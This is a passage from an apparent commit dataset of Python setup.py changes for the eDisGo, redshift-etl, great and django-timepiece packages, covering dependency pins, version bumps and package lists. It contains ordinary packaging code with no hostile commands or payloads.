data_path = os.path.join(edisgo_path, 'data')
if not os.path.isdir(edisgo_path):
os.mkdir(edisgo_path)
if not os.path.isdir(data_path):
os.mkdir(data_path)
setup(
name='eDisGo',
version='0.0.1',
packages=find_packages(),
url='https://github.com/openego/eDisGo',
license='GNU Affero General Public License v3.0',
author='gplssm, nesnoj',
author_email='',
description='A python package for distribution grid analysis and optimization',
install_requires = [
'dingo==0.1.0-pre+git.477bf495',
'networkx >=1.11',
'shapely >= 1.5.12, <= 1.5.12',
'pandas >=0.19.2, <=0.20.1'
],
cmdclass={
'install': InstallSetup},
dependency_links=['https://github.com/openego/dingo/archive/'\
'477bf49534f93aca90ba3c5231fe726972343939.zip'\
'#egg=dingo-0.1.0-pre+git.477bf495']
) | from setuptools import find_packages, setup
from setuptools.command.install import install
import os
BASEPATH='.eDisGo'
class InstallSetup(install):
def run(self):
self.create_edisgo_path()
install.run(self)
@staticmethod
def create_edisgo_path():
edisgo_path = os.path.join(os.path.expanduser('~'), BASEPATH)
data_path = os.path.join(edisgo_path, 'data')
if not os.path.isdir(edisgo_path):
os.mkdir(edisgo_path)
if not os.path.isdir(data_path):
os.mkdir(data_path)
setup(
name='eDisGo',
version='0.0.1',
packages=find_packages(),
url='https://github.com/openego/eDisGo',
license='GNU Affero General Public License v3.0',
author='gplssm, nesnoj',
author_email='',
description='A python package for distribution grid analysis and optimization',
install_requires = [
'ding0==0.1.2',
'networkx >=1.11',
'shapely >= 1.5.12, <= 1.5.12',
'pandas >=0.19.2, <=0.20.1'
],
cmdclass={
'install': InstallSetup}
) | Install with dingo version 0.1.2 | Install with dingo version 0.1.2
| Python | agpl-3.0 | openego/eDisGo,openego/eDisGo | from setuptools import find_packages, setup
from setuptools.command.install import install
import os
BASEPATH='.eDisGo'
class InstallSetup(install):
def run(self):
self.create_edisgo_path()
install.run(self)
@staticmethod
def create_edisgo_path():
edisgo_path = os.path.join(os.path.expanduser('~'), BASEPATH)
data_path = os.path.join(edisgo_path, 'data')
if not os.path.isdir(edisgo_path):
os.mkdir(edisgo_path)
if not os.path.isdir(data_path):
os.mkdir(data_path)
setup(
name='eDisGo',
version='0.0.1',
packages=find_packages(),
url='https://github.com/openego/eDisGo',
license='GNU Affero General Public License v3.0',
author='gplssm, nesnoj',
author_email='',
description='A python package for distribution grid analysis and optimization',
install_requires = [
'dingo==0.1.0-pre+git.477bf495',
'networkx >=1.11',
'shapely >= 1.5.12, <= 1.5.12',
'pandas >=0.19.2, <=0.20.1'
],
cmdclass={
'install': InstallSetup},
dependency_links=['https://github.com/openego/dingo/archive/'\
'477bf49534f93aca90ba3c5231fe726972343939.zip'\
'#egg=dingo-0.1.0-pre+git.477bf495']
)Install with dingo version 0.1.2 | from setuptools import find_packages, setup
from setuptools.command.install import install
import os
BASEPATH='.eDisGo'
class InstallSetup(install):
def run(self):
self.create_edisgo_path()
install.run(self)
@staticmethod
def create_edisgo_path():
edisgo_path = os.path.join(os.path.expanduser('~'), BASEPATH)
data_path = os.path.join(edisgo_path, 'data')
if not os.path.isdir(edisgo_path):
os.mkdir(edisgo_path)
if not os.path.isdir(data_path):
os.mkdir(data_path)
setup(
name='eDisGo',
version='0.0.1',
packages=find_packages(),
url='https://github.com/openego/eDisGo',
license='GNU Affero General Public License v3.0',
author='gplssm, nesnoj',
author_email='',
description='A python package for distribution grid analysis and optimization',
install_requires = [
'ding0==0.1.2',
'networkx >=1.11',
'shapely >= 1.5.12, <= 1.5.12',
'pandas >=0.19.2, <=0.20.1'
],
cmdclass={
'install': InstallSetup}
) | <commit_before>from setuptools import find_packages, setup
from setuptools.command.install import install
import os
BASEPATH='.eDisGo'
class InstallSetup(install):
def run(self):
self.create_edisgo_path()
install.run(self)
@staticmethod
def create_edisgo_path():
edisgo_path = os.path.join(os.path.expanduser('~'), BASEPATH)
data_path = os.path.join(edisgo_path, 'data')
if not os.path.isdir(edisgo_path):
os.mkdir(edisgo_path)
if not os.path.isdir(data_path):
os.mkdir(data_path)
setup(
name='eDisGo',
version='0.0.1',
packages=find_packages(),
url='https://github.com/openego/eDisGo',
license='GNU Affero General Public License v3.0',
author='gplssm, nesnoj',
author_email='',
description='A python package for distribution grid analysis and optimization',
install_requires = [
'dingo==0.1.0-pre+git.477bf495',
'networkx >=1.11',
'shapely >= 1.5.12, <= 1.5.12',
'pandas >=0.19.2, <=0.20.1'
],
cmdclass={
'install': InstallSetup},
dependency_links=['https://github.com/openego/dingo/archive/'\
'477bf49534f93aca90ba3c5231fe726972343939.zip'\
'#egg=dingo-0.1.0-pre+git.477bf495']
)<commit_msg>Install with dingo version 0.1.2<commit_after> | from setuptools import find_packages, setup
from setuptools.command.install import install
import os
BASEPATH='.eDisGo'
class InstallSetup(install):
def run(self):
self.create_edisgo_path()
install.run(self)
@staticmethod
def create_edisgo_path():
edisgo_path = os.path.join(os.path.expanduser('~'), BASEPATH)
data_path = os.path.join(edisgo_path, 'data')
if not os.path.isdir(edisgo_path):
os.mkdir(edisgo_path)
if not os.path.isdir(data_path):
os.mkdir(data_path)
setup(
name='eDisGo',
version='0.0.1',
packages=find_packages(),
url='https://github.com/openego/eDisGo',
license='GNU Affero General Public License v3.0',
author='gplssm, nesnoj',
author_email='',
description='A python package for distribution grid analysis and optimization',
install_requires = [
'ding0==0.1.2',
'networkx >=1.11',
'shapely >= 1.5.12, <= 1.5.12',
'pandas >=0.19.2, <=0.20.1'
],
cmdclass={
'install': InstallSetup}
) | from setuptools import find_packages, setup
from setuptools.command.install import install
import os
BASEPATH='.eDisGo'
class InstallSetup(install):
def run(self):
self.create_edisgo_path()
install.run(self)
@staticmethod
def create_edisgo_path():
edisgo_path = os.path.join(os.path.expanduser('~'), BASEPATH)
data_path = os.path.join(edisgo_path, 'data')
if not os.path.isdir(edisgo_path):
os.mkdir(edisgo_path)
if not os.path.isdir(data_path):
os.mkdir(data_path)
setup(
name='eDisGo',
version='0.0.1',
packages=find_packages(),
url='https://github.com/openego/eDisGo',
license='GNU Affero General Public License v3.0',
author='gplssm, nesnoj',
author_email='',
description='A python package for distribution grid analysis and optimization',
install_requires = [
'dingo==0.1.0-pre+git.477bf495',
'networkx >=1.11',
'shapely >= 1.5.12, <= 1.5.12',
'pandas >=0.19.2, <=0.20.1'
],
cmdclass={
'install': InstallSetup},
dependency_links=['https://github.com/openego/dingo/archive/'\
'477bf49534f93aca90ba3c5231fe726972343939.zip'\
'#egg=dingo-0.1.0-pre+git.477bf495']
)Install with dingo version 0.1.2from setuptools import find_packages, setup
from setuptools.command.install import install
import os
BASEPATH='.eDisGo'
class InstallSetup(install):
def run(self):
self.create_edisgo_path()
install.run(self)
@staticmethod
def create_edisgo_path():
edisgo_path = os.path.join(os.path.expanduser('~'), BASEPATH)
data_path = os.path.join(edisgo_path, 'data')
if not os.path.isdir(edisgo_path):
os.mkdir(edisgo_path)
if not os.path.isdir(data_path):
os.mkdir(data_path)
setup(
name='eDisGo',
version='0.0.1',
packages=find_packages(),
url='https://github.com/openego/eDisGo',
license='GNU Affero General Public License v3.0',
author='gplssm, nesnoj',
author_email='',
description='A python package for distribution grid analysis and optimization',
install_requires = [
'ding0==0.1.2',
'networkx >=1.11',
'shapely >= 1.5.12, <= 1.5.12',
'pandas >=0.19.2, <=0.20.1'
],
cmdclass={
'install': InstallSetup}
) | <commit_before>from setuptools import find_packages, setup
from setuptools.command.install import install
import os
BASEPATH='.eDisGo'
class InstallSetup(install):
def run(self):
self.create_edisgo_path()
install.run(self)
@staticmethod
def create_edisgo_path():
edisgo_path = os.path.join(os.path.expanduser('~'), BASEPATH)
data_path = os.path.join(edisgo_path, 'data')
if not os.path.isdir(edisgo_path):
os.mkdir(edisgo_path)
if not os.path.isdir(data_path):
os.mkdir(data_path)
setup(
name='eDisGo',
version='0.0.1',
packages=find_packages(),
url='https://github.com/openego/eDisGo',
license='GNU Affero General Public License v3.0',
author='gplssm, nesnoj',
author_email='',
description='A python package for distribution grid analysis and optimization',
install_requires = [
'dingo==0.1.0-pre+git.477bf495',
'networkx >=1.11',
'shapely >= 1.5.12, <= 1.5.12',
'pandas >=0.19.2, <=0.20.1'
],
cmdclass={
'install': InstallSetup},
dependency_links=['https://github.com/openego/dingo/archive/'\
'477bf49534f93aca90ba3c5231fe726972343939.zip'\
'#egg=dingo-0.1.0-pre+git.477bf495']
)<commit_msg>Install with dingo version 0.1.2<commit_after>from setuptools import find_packages, setup
from setuptools.command.install import install
import os
BASEPATH='.eDisGo'
class InstallSetup(install):
def run(self):
self.create_edisgo_path()
install.run(self)
@staticmethod
def create_edisgo_path():
edisgo_path = os.path.join(os.path.expanduser('~'), BASEPATH)
data_path = os.path.join(edisgo_path, 'data')
if not os.path.isdir(edisgo_path):
os.mkdir(edisgo_path)
if not os.path.isdir(data_path):
os.mkdir(data_path)
setup(
name='eDisGo',
version='0.0.1',
packages=find_packages(),
url='https://github.com/openego/eDisGo',
license='GNU Affero General Public License v3.0',
author='gplssm, nesnoj',
author_email='',
description='A python package for distribution grid analysis and optimization',
install_requires = [
'ding0==0.1.2',
'networkx >=1.11',
'shapely >= 1.5.12, <= 1.5.12',
'pandas >=0.19.2, <=0.20.1'
],
cmdclass={
'install': InstallSetup}
) |
75c10d885c89cd763a065e4eb599ea5032b31fdd | setup.py | setup.py | from setuptools import find_packages, setup
setup(
name="redshift-etl",
version="0.27.0",
author="Harry's Data Engineering and Contributors",
description="ETL code to ferry data from PostgreSQL databases (or S3 files) to Redshift cluster",
license="MIT",
keywords="redshift postgresql etl extract transform load",
url="https://github.com/harrystech/harrys-redshift-etl",
package_dir={"": "python"},
packages=find_packages("python"),
package_data={
"etl": [
"assets/*",
"config/*"
]
},
scripts=[
"python/scripts/submit_arthur.sh",
"python/scripts/re_run_partial_pipeline.py"
],
entry_points={
"console_scripts": [
# NB The script must end in ".py" so that spark submit accepts it as a Python script.
"arthur.py = etl.commands:run_arg_as_command",
"run_tests.py = etl.selftest:run_tests"
]
}
)
| from setuptools import find_packages, setup
setup(
name="redshift-etl",
version="0.27.1",
author="Harry's Data Engineering and Contributors",
description="ETL code to ferry data from PostgreSQL databases (or S3 files) to Redshift cluster",
license="MIT",
keywords="redshift postgresql etl extract transform load",
url="https://github.com/harrystech/harrys-redshift-etl",
package_dir={"": "python"},
packages=find_packages("python"),
package_data={
"etl": [
"assets/*",
"config/*"
]
},
scripts=[
"python/scripts/submit_arthur.sh",
"python/scripts/re_run_partial_pipeline.py"
],
entry_points={
"console_scripts": [
# NB The script must end in ".py" so that spark submit accepts it as a Python script.
"arthur.py = etl.commands:run_arg_as_command",
"run_tests.py = etl.selftest:run_tests"
]
}
)
| Drop max-concurrency for update in refresh pipeline (invalid arg) | Drop max-concurrency for update in refresh pipeline (invalid arg)
| Python | mit | harrystech/arthur-redshift-etl,harrystech/arthur-redshift-etl,harrystech/arthur-redshift-etl,harrystech/arthur-redshift-etl,harrystech/arthur-redshift-etl | from setuptools import find_packages, setup
setup(
name="redshift-etl",
version="0.27.0",
author="Harry's Data Engineering and Contributors",
description="ETL code to ferry data from PostgreSQL databases (or S3 files) to Redshift cluster",
license="MIT",
keywords="redshift postgresql etl extract transform load",
url="https://github.com/harrystech/harrys-redshift-etl",
package_dir={"": "python"},
packages=find_packages("python"),
package_data={
"etl": [
"assets/*",
"config/*"
]
},
scripts=[
"python/scripts/submit_arthur.sh",
"python/scripts/re_run_partial_pipeline.py"
],
entry_points={
"console_scripts": [
# NB The script must end in ".py" so that spark submit accepts it as a Python script.
"arthur.py = etl.commands:run_arg_as_command",
"run_tests.py = etl.selftest:run_tests"
]
}
)
Drop max-concurrency for update in refresh pipeline (invalid arg) | from setuptools import find_packages, setup
setup(
name="redshift-etl",
version="0.27.1",
author="Harry's Data Engineering and Contributors",
description="ETL code to ferry data from PostgreSQL databases (or S3 files) to Redshift cluster",
license="MIT",
keywords="redshift postgresql etl extract transform load",
url="https://github.com/harrystech/harrys-redshift-etl",
package_dir={"": "python"},
packages=find_packages("python"),
package_data={
"etl": [
"assets/*",
"config/*"
]
},
scripts=[
"python/scripts/submit_arthur.sh",
"python/scripts/re_run_partial_pipeline.py"
],
entry_points={
"console_scripts": [
# NB The script must end in ".py" so that spark submit accepts it as a Python script.
"arthur.py = etl.commands:run_arg_as_command",
"run_tests.py = etl.selftest:run_tests"
]
}
)
| <commit_before>from setuptools import find_packages, setup
setup(
name="redshift-etl",
version="0.27.0",
author="Harry's Data Engineering and Contributors",
description="ETL code to ferry data from PostgreSQL databases (or S3 files) to Redshift cluster",
license="MIT",
keywords="redshift postgresql etl extract transform load",
url="https://github.com/harrystech/harrys-redshift-etl",
package_dir={"": "python"},
packages=find_packages("python"),
package_data={
"etl": [
"assets/*",
"config/*"
]
},
scripts=[
"python/scripts/submit_arthur.sh",
"python/scripts/re_run_partial_pipeline.py"
],
entry_points={
"console_scripts": [
# NB The script must end in ".py" so that spark submit accepts it as a Python script.
"arthur.py = etl.commands:run_arg_as_command",
"run_tests.py = etl.selftest:run_tests"
]
}
)
<commit_msg>Drop max-concurrency for update in refresh pipeline (invalid arg)<commit_after> | from setuptools import find_packages, setup
setup(
name="redshift-etl",
version="0.27.1",
author="Harry's Data Engineering and Contributors",
description="ETL code to ferry data from PostgreSQL databases (or S3 files) to Redshift cluster",
license="MIT",
keywords="redshift postgresql etl extract transform load",
url="https://github.com/harrystech/harrys-redshift-etl",
package_dir={"": "python"},
packages=find_packages("python"),
package_data={
"etl": [
"assets/*",
"config/*"
]
},
scripts=[
"python/scripts/submit_arthur.sh",
"python/scripts/re_run_partial_pipeline.py"
],
entry_points={
"console_scripts": [
# NB The script must end in ".py" so that spark submit accepts it as a Python script.
"arthur.py = etl.commands:run_arg_as_command",
"run_tests.py = etl.selftest:run_tests"
]
}
)
| from setuptools import find_packages, setup
setup(
name="redshift-etl",
version="0.27.0",
author="Harry's Data Engineering and Contributors",
description="ETL code to ferry data from PostgreSQL databases (or S3 files) to Redshift cluster",
license="MIT",
keywords="redshift postgresql etl extract transform load",
url="https://github.com/harrystech/harrys-redshift-etl",
package_dir={"": "python"},
packages=find_packages("python"),
package_data={
"etl": [
"assets/*",
"config/*"
]
},
scripts=[
"python/scripts/submit_arthur.sh",
"python/scripts/re_run_partial_pipeline.py"
],
entry_points={
"console_scripts": [
# NB The script must end in ".py" so that spark submit accepts it as a Python script.
"arthur.py = etl.commands:run_arg_as_command",
"run_tests.py = etl.selftest:run_tests"
]
}
)
Drop max-concurrency for update in refresh pipeline (invalid arg)from setuptools import find_packages, setup
setup(
name="redshift-etl",
version="0.27.1",
author="Harry's Data Engineering and Contributors",
description="ETL code to ferry data from PostgreSQL databases (or S3 files) to Redshift cluster",
license="MIT",
keywords="redshift postgresql etl extract transform load",
url="https://github.com/harrystech/harrys-redshift-etl",
package_dir={"": "python"},
packages=find_packages("python"),
package_data={
"etl": [
"assets/*",
"config/*"
]
},
scripts=[
"python/scripts/submit_arthur.sh",
"python/scripts/re_run_partial_pipeline.py"
],
entry_points={
"console_scripts": [
# NB The script must end in ".py" so that spark submit accepts it as a Python script.
"arthur.py = etl.commands:run_arg_as_command",
"run_tests.py = etl.selftest:run_tests"
]
}
)
| <commit_before>from setuptools import find_packages, setup
setup(
name="redshift-etl",
version="0.27.0",
author="Harry's Data Engineering and Contributors",
description="ETL code to ferry data from PostgreSQL databases (or S3 files) to Redshift cluster",
license="MIT",
keywords="redshift postgresql etl extract transform load",
url="https://github.com/harrystech/harrys-redshift-etl",
package_dir={"": "python"},
packages=find_packages("python"),
package_data={
"etl": [
"assets/*",
"config/*"
]
},
scripts=[
"python/scripts/submit_arthur.sh",
"python/scripts/re_run_partial_pipeline.py"
],
entry_points={
"console_scripts": [
# NB The script must end in ".py" so that spark submit accepts it as a Python script.
"arthur.py = etl.commands:run_arg_as_command",
"run_tests.py = etl.selftest:run_tests"
]
}
)
<commit_msg>Drop max-concurrency for update in refresh pipeline (invalid arg)<commit_after>from setuptools import find_packages, setup
setup(
name="redshift-etl",
version="0.27.1",
author="Harry's Data Engineering and Contributors",
description="ETL code to ferry data from PostgreSQL databases (or S3 files) to Redshift cluster",
license="MIT",
keywords="redshift postgresql etl extract transform load",
url="https://github.com/harrystech/harrys-redshift-etl",
package_dir={"": "python"},
packages=find_packages("python"),
package_data={
"etl": [
"assets/*",
"config/*"
]
},
scripts=[
"python/scripts/submit_arthur.sh",
"python/scripts/re_run_partial_pipeline.py"
],
entry_points={
"console_scripts": [
# NB The script must end in ".py" so that spark submit accepts it as a Python script.
"arthur.py = etl.commands:run_arg_as_command",
"run_tests.py = etl.selftest:run_tests"
]
}
)
|
67cb72b37ce0e68ceee7943295934f1d1fda179e | setup.py | setup.py | import os
from setuptools import find_packages, setup
from great import __url__
with open(os.path.join(os.path.dirname(__file__), "README.rst")) as readme:
long_description = readme.read()
classifiers = [
"Development Status :: 3 - Alpha",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy"
]
setup(
name="great",
packages=find_packages(),
setup_requires=["setuptools_scm"],
use_scm_version=True,
install_requires=[
"Alchimia",
"appdirs",
"attrs",
"filesystems",
"hyperlink",
"Minion",
"pytoml",
"SQLAlchemy",
"Twisted",
"txmusicbrainz",
],
author="Julian Berman",
author_email="Julian@GrayVines.com",
classifiers=classifiers,
description="A ratings aggregator",
license="MIT",
long_description=long_description,
url=__url__,
)
| import os
from setuptools import find_packages, setup
from great import __url__
with open(os.path.join(os.path.dirname(__file__), "README.rst")) as readme:
long_description = readme.read()
classifiers = [
"Development Status :: 3 - Alpha",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy"
]
setup(
name="great",
packages=find_packages() + ["twisted.plugins"],
setup_requires=["setuptools_scm"],
use_scm_version=True,
install_requires=[
"Alchimia",
"appdirs",
"attrs",
"filesystems",
"hyperlink",
"Minion",
"pytoml",
"SQLAlchemy",
"Twisted",
"txmusicbrainz",
],
author="Julian Berman",
author_email="Julian@GrayVines.com",
classifiers=classifiers,
description="A ratings aggregator",
license="MIT",
long_description=long_description,
url=__url__,
)
| Make sure to install the tap. | Make sure to install the tap.
| Python | mit | Julian/Great,Julian/Great,Julian/Great | import os
from setuptools import find_packages, setup
from great import __url__
with open(os.path.join(os.path.dirname(__file__), "README.rst")) as readme:
long_description = readme.read()
classifiers = [
"Development Status :: 3 - Alpha",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy"
]
setup(
name="great",
packages=find_packages(),
setup_requires=["setuptools_scm"],
use_scm_version=True,
install_requires=[
"Alchimia",
"appdirs",
"attrs",
"filesystems",
"hyperlink",
"Minion",
"pytoml",
"SQLAlchemy",
"Twisted",
"txmusicbrainz",
],
author="Julian Berman",
author_email="Julian@GrayVines.com",
classifiers=classifiers,
description="A ratings aggregator",
license="MIT",
long_description=long_description,
url=__url__,
)
Make sure to install the tap. | import os
from setuptools import find_packages, setup
from great import __url__
with open(os.path.join(os.path.dirname(__file__), "README.rst")) as readme:
long_description = readme.read()
classifiers = [
"Development Status :: 3 - Alpha",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy"
]
setup(
name="great",
packages=find_packages() + ["twisted.plugins"],
setup_requires=["setuptools_scm"],
use_scm_version=True,
install_requires=[
"Alchimia",
"appdirs",
"attrs",
"filesystems",
"hyperlink",
"Minion",
"pytoml",
"SQLAlchemy",
"Twisted",
"txmusicbrainz",
],
author="Julian Berman",
author_email="Julian@GrayVines.com",
classifiers=classifiers,
description="A ratings aggregator",
license="MIT",
long_description=long_description,
url=__url__,
)
| <commit_before>import os
from setuptools import find_packages, setup
from great import __url__
with open(os.path.join(os.path.dirname(__file__), "README.rst")) as readme:
long_description = readme.read()
classifiers = [
"Development Status :: 3 - Alpha",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy"
]
setup(
name="great",
packages=find_packages(),
setup_requires=["setuptools_scm"],
use_scm_version=True,
install_requires=[
"Alchimia",
"appdirs",
"attrs",
"filesystems",
"hyperlink",
"Minion",
"pytoml",
"SQLAlchemy",
"Twisted",
"txmusicbrainz",
],
author="Julian Berman",
author_email="Julian@GrayVines.com",
classifiers=classifiers,
description="A ratings aggregator",
license="MIT",
long_description=long_description,
url=__url__,
)
<commit_msg>Make sure to install the tap.<commit_after> | import os
from setuptools import find_packages, setup
from great import __url__
with open(os.path.join(os.path.dirname(__file__), "README.rst")) as readme:
long_description = readme.read()
classifiers = [
"Development Status :: 3 - Alpha",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy"
]
setup(
name="great",
packages=find_packages() + ["twisted.plugins"],
setup_requires=["setuptools_scm"],
use_scm_version=True,
install_requires=[
"Alchimia",
"appdirs",
"attrs",
"filesystems",
"hyperlink",
"Minion",
"pytoml",
"SQLAlchemy",
"Twisted",
"txmusicbrainz",
],
author="Julian Berman",
author_email="Julian@GrayVines.com",
classifiers=classifiers,
description="A ratings aggregator",
license="MIT",
long_description=long_description,
url=__url__,
)
| import os
from setuptools import find_packages, setup
from great import __url__
with open(os.path.join(os.path.dirname(__file__), "README.rst")) as readme:
long_description = readme.read()
classifiers = [
"Development Status :: 3 - Alpha",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy"
]
setup(
name="great",
packages=find_packages(),
setup_requires=["setuptools_scm"],
use_scm_version=True,
install_requires=[
"Alchimia",
"appdirs",
"attrs",
"filesystems",
"hyperlink",
"Minion",
"pytoml",
"SQLAlchemy",
"Twisted",
"txmusicbrainz",
],
author="Julian Berman",
author_email="Julian@GrayVines.com",
classifiers=classifiers,
description="A ratings aggregator",
license="MIT",
long_description=long_description,
url=__url__,
)
Make sure to install the tap.import os
from setuptools import find_packages, setup
from great import __url__
with open(os.path.join(os.path.dirname(__file__), "README.rst")) as readme:
long_description = readme.read()
classifiers = [
"Development Status :: 3 - Alpha",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy"
]
setup(
name="great",
packages=find_packages() + ["twisted.plugins"],
setup_requires=["setuptools_scm"],
use_scm_version=True,
install_requires=[
"Alchimia",
"appdirs",
"attrs",
"filesystems",
"hyperlink",
"Minion",
"pytoml",
"SQLAlchemy",
"Twisted",
"txmusicbrainz",
],
author="Julian Berman",
author_email="Julian@GrayVines.com",
classifiers=classifiers,
description="A ratings aggregator",
license="MIT",
long_description=long_description,
url=__url__,
)
| <commit_before>import os
from setuptools import find_packages, setup
from great import __url__
with open(os.path.join(os.path.dirname(__file__), "README.rst")) as readme:
long_description = readme.read()
classifiers = [
"Development Status :: 3 - Alpha",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy"
]
setup(
name="great",
packages=find_packages(),
setup_requires=["setuptools_scm"],
use_scm_version=True,
install_requires=[
"Alchimia",
"appdirs",
"attrs",
"filesystems",
"hyperlink",
"Minion",
"pytoml",
"SQLAlchemy",
"Twisted",
"txmusicbrainz",
],
author="Julian Berman",
author_email="Julian@GrayVines.com",
classifiers=classifiers,
description="A ratings aggregator",
license="MIT",
long_description=long_description,
url=__url__,
)
<commit_msg>Make sure to install the tap.<commit_after>import os
from setuptools import find_packages, setup
from great import __url__
with open(os.path.join(os.path.dirname(__file__), "README.rst")) as readme:
long_description = readme.read()
classifiers = [
"Development Status :: 3 - Alpha",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy"
]
setup(
name="great",
packages=find_packages() + ["twisted.plugins"],
setup_requires=["setuptools_scm"],
use_scm_version=True,
install_requires=[
"Alchimia",
"appdirs",
"attrs",
"filesystems",
"hyperlink",
"Minion",
"pytoml",
"SQLAlchemy",
"Twisted",
"txmusicbrainz",
],
author="Julian Berman",
author_email="Julian@GrayVines.com",
classifiers=classifiers,
description="A ratings aggregator",
license="MIT",
long_description=long_description,
url=__url__,
)
|
5d5d55c80b6067e6e785a5b4578124a6759a1cfd | setup.py | setup.py | from setuptools import setup, find_packages
setup(
name='django-timepiece',
version=__import__('timepiece').__version__,
author='Caktus Consulting Group',
author_email='solutions@caktusgroup.com',
packages=find_packages(exclude=['example_project']),
include_package_data=True,
url='https://github.com/caktus/django-timepiece',
license='BSD',
long_description=open('README.rst').read(),
zip_safe=False, # because we're including media that Django needs
description="django-timepiece is a multi-user application for tracking "
"people's time on projects.",
classifiers=[
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Development Status :: 4 - Beta',
'Operating System :: OS Independent',
],
install_requires = [
"python-dateutil==1.5",
"django-ajax-selects==1.1.4",
"django-pagination==1.0.7",
"textile==2.1.4",
"django-selectable==0.2.0",
],
)
| from setuptools import setup, find_packages
setup(
name='django-timepiece',
version=__import__('timepiece').__version__,
author='Caktus Consulting Group',
author_email='solutions@caktusgroup.com',
packages=find_packages(exclude=['example_project']),
include_package_data=True,
url='https://github.com/caktus/django-timepiece',
license='BSD',
long_description=open('README.rst').read(),
zip_safe=False, # because we're including media that Django needs
description="django-timepiece is a multi-user application for tracking "
"people's time on projects.",
classifiers=[
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Development Status :: 4 - Beta',
'Operating System :: OS Independent',
],
install_requires = [
"python-dateutil==1.5",
"django-ajax-selects==1.1.4",
"django-pagination==1.0.7",
"django-selectable==0.2.0",
],
)
| Remove textile requirement from install_requires | Remove textile requirement from install_requires | Python | mit | dannybrowne86/django-timepiece,BocuStudio/django-timepiece,gaga3966/django-timepiece,caktus/django-timepiece,dannybrowne86/django-timepiece,BocuStudio/django-timepiece,arbitrahj/django-timepiece,josesanch/django-timepiece,dannybrowne86/django-timepiece,caktus/django-timepiece,caktus/django-timepiece,gaga3966/django-timepiece,gaga3966/django-timepiece,josesanch/django-timepiece,arbitrahj/django-timepiece,BocuStudio/django-timepiece,josesanch/django-timepiece,arbitrahj/django-timepiece | from setuptools import setup, find_packages
setup(
name='django-timepiece',
version=__import__('timepiece').__version__,
author='Caktus Consulting Group',
author_email='solutions@caktusgroup.com',
packages=find_packages(exclude=['example_project']),
include_package_data=True,
url='https://github.com/caktus/django-timepiece',
license='BSD',
long_description=open('README.rst').read(),
zip_safe=False, # because we're including media that Django needs
description="django-timepiece is a multi-user application for tracking "
"people's time on projects.",
classifiers=[
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Development Status :: 4 - Beta',
'Operating System :: OS Independent',
],
install_requires = [
"python-dateutil==1.5",
"django-ajax-selects==1.1.4",
"django-pagination==1.0.7",
"textile==2.1.4",
"django-selectable==0.2.0",
],
)
Remove textile requirement from install_requires | from setuptools import setup, find_packages
setup(
name='django-timepiece',
version=__import__('timepiece').__version__,
author='Caktus Consulting Group',
author_email='solutions@caktusgroup.com',
packages=find_packages(exclude=['example_project']),
include_package_data=True,
url='https://github.com/caktus/django-timepiece',
license='BSD',
long_description=open('README.rst').read(),
zip_safe=False, # because we're including media that Django needs
description="django-timepiece is a multi-user application for tracking "
"people's time on projects.",
classifiers=[
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Development Status :: 4 - Beta',
'Operating System :: OS Independent',
],
install_requires = [
"python-dateutil==1.5",
"django-ajax-selects==1.1.4",
"django-pagination==1.0.7",
"django-selectable==0.2.0",
],
)
| <commit_before>from setuptools import setup, find_packages
setup(
name='django-timepiece',
version=__import__('timepiece').__version__,
author='Caktus Consulting Group',
author_email='solutions@caktusgroup.com',
packages=find_packages(exclude=['example_project']),
include_package_data=True,
url='https://github.com/caktus/django-timepiece',
license='BSD',
long_description=open('README.rst').read(),
zip_safe=False, # because we're including media that Django needs
